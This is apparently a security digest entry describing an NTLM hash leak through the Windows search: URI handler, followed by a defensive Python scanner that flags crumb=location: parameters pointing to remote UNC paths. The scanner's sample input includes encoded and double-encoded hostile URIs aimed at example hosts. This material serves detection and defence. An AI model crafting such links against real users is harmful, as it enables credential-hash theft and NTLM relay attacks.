NTLM Leak via Windows Search URI Handler

The article discusses a vulnerability in the Windows search: URI handler that leads to the leakage of Net-NTLMv2 password hashes. The issue stems from improper handling of parameters (e.g., crumb=location:), which allows passing a UNC path to a remote SMB resource. As a result, the system automatically initiates NTLM authentication to an attacker-controlled server, exposing the user's credential hash. The vulnerability is conceptually similar to a previously patched issue (CVE-2026-33829), but in this case, no CVE or official patch is available.
Once the hash is leaked, an attacker can use it for NTLM relay attacks or further compromise of the infrastructure. A key aspect of this vulnerability is that it does not require code execution on the target system and can be integrated into coercion attack chains, expanding the attack surface through standard Windows URI handler mechanisms.
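
The following check is an added example, not code from the article: it pulls search: URIs out of text such as HTML, mail bodies or proxy logs and reports any crumb=location: value that resolves to a UNC path on a remote host. Coverage of the search-ms: scheme, the nested percent-decoding and the sample input are assumptions of this example.

```python
import re
from urllib.parse import unquote

# search: is the handler named above; search-ms: is a sibling scheme,
# covered here as an assumption of this example.
URI_RE = re.compile(r"(?i)\bsearch(?:-ms)?:[^\s\"'<>]+")
LOCATION_PREFIX = "crumb=location:"

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %255C -> %5C -> backslash)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_hosts(uri):
    """Return the remote hosts referenced by crumb=location: in one URI."""
    hosts = []
    _, _, params = uri.partition(":")
    for raw in params.split("&"):
        param = fully_decode(raw).strip()
        if not param.lower().startswith(LOCATION_PREFIX):
            continue
        path = param[len(LOCATION_PREFIX):].replace("/", "\\")
        if path.lower().startswith("file:"):
            path = path[5:]
        if not path.startswith("\\\\"):
            continue  # drive-letter or relative path: stays local
        host = path[2:].split("\\", 1)[0]
        if host and host not in ("?", "."):  # \\?\ and \\.\ are local device paths
            hosts.append(host.lower())
    return hosts

def scan(text):
    """Find handler URIs in arbitrary text; return (uri, host) findings."""
    return [(u, h) for u in URI_RE.findall(text) for h in remote_hosts(u)]

# Constructed sample input (documentation hostnames and addresses only).
SAMPLE = """\
<a href="search:query=invoice&crumb=location:C:\\Users\\Public">local</a>
<a href="search:query=q3&crumb=location:%5C%5Cfiles.example.test%5Cshare">x</a>
GET /r?u=search-ms:query=a&crumb=location:%255C%255C203.0.113.7%255Cs HTTP/1.1
"""

if __name__ == "__main__":
    for uri, host in scan(SAMPLE):
        print(f"remote location crumb -> {host}: {uri}")
```

Only the second and third sample entries are reported; the first points at a local drive path and is ignored.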

Vulnerabilities: CVE-2026-33829 (5.0)
Researchers: Marcos Díaz
Products: Net-NTLMv2, search: URI handler, SMB, UNC, Windows
Published: 2026-06-08, 10:46